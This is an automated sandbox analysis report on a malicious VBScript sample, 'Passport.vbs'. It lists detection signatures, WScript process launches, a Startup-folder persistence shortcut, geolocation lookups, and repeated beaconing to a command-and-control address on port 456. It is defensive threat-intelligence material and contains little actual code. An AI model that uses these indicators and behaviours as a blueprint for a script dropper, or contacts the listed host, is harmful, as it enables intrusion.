Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Passport.vbs

Overview

General Information

Sample name:Passport.vbs
Analysis ID:1523251
MD5:a6e8ec20954128687a0534917c8f9ddd
SHA1:c0bac2548af02d37b18b16bddb39ccd9ea5f0cc2
SHA256:aca5887474e22b7be6121c56919953745a7a821311080acbe8970da7ed9479b8
Tags:vbsuser-ankit_anubhav
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Potential context-aware VBS script found (checks for environment specific values)
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • wscript.exe (PID: 5276 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5752 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , ProcessId: 5752, ProcessName: wscript.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs" , ProcessId: 5752, ProcessName: wscript.exe
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", ProcessId: 5276, ProcessName: wscript.exe
Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Local\Temp\Passport.vbs
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 34.117.59.81, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5276, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5276, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs", ProcessId: 5276, ProcessName: wscript.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.7% probability
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

Networking

barindex
Source: C:\Windows\System32\wscript.exeNetwork Connect: 34.117.59.81 443Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 185.244.29.74 456Jump to behavior
Source: Initial file: xx.setrequestheader "User-Agent",gg
Source: C:\Windows\System32\wscript.exeDropped file: xx.setrequestheader "User-Agent",gg Jump to dropped file
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 456
Source: unknownNetwork traffic detected: HTTP traffic on port 456 -> 49730
Source: global trafficTCP traffic: 192.168.2.5:49706 -> 185.244.29.74:456
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: Joe Sandbox ViewASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownDNS query: name: ipinfo.io
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /org HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /org HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: unknownTCP traffic detected without corresponding DNS query: 185.244.29.74
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /org HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /org HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ipinfo.ioConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: ipinfo.io
Source: unknownHTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:456Content-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74/
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74/d1
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74/j
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155696546.00000282CCBC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.drString found in binary or memory: http://185.244.29.74:456/document
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/document&
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/document32
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentB
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentG
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentJ
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentT
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentX
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/document_
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentage:
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentgE
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentnE
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentq
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.244.29.74:456/documentr
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.drString found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country6%
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/countryS
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/countryW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/countryY:
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/country_
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/countryq
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/countryz%
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4525760224.00000282CADAD000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.drString found in binary or memory: https://ipinfo.io/org
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/org_
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2

System Summary

barindex
Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Source: Passport.vbsInitial sample: Strings found which are bigger than 50
Source: classification engineClassification label: mal100.troj.evad.winVBS@2/7@1/2
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnkJump to behavior
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\Passport.vbsJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs"
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
